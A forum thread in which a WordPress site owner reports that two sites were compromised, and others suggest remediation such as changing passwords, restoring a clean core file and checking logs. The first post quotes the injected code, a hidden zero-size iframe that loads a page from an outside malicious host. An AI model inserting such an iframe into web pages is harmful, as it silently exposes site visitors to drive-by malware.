Hello two of my sites were attacked by malicious script and are now down. These two wordpress sites have been injected by this code <iframe frameborder="0" height="0" name="frame1" scrolling="no" src="http://roots.choufouna.com:8080/home/1/" width="0"></iframe> <!--73e181c1b8bd4e09d3bc7f39bb0cb1dd--> Code (markup): the file which was infected was under wp-includes/default-widgets.php last line had this code my site autogl.com is already been banned by firefox today what should I do Please help me I want to prevent my site anyone else facing similar problem
First step you should perform is change all password. Don't save password in any FTP client. Ask you host to have mod_security and csf firewall installed.
thanks guys all files have been compromised entire site is showing the same iframe both sites are on different servers I think some plugin is causing problem or may be our ftp client is the problem
There is apparently, a xss vulnerability with WP 3.01 although I'm not sure if it requires ant plugins or not. The other thing you're talking about is Gumblar or a variant. More info here and here.
Replace the wp-includes/default-widgets.php with a clean copy and set its permissions to read only. That way if it was a script that modified the file it wont be able to do it again. If it was modified via ftp, then you'll need to change your ftp passwords. Search your logs for "default-widgets.php" and see if you can work out what changed it.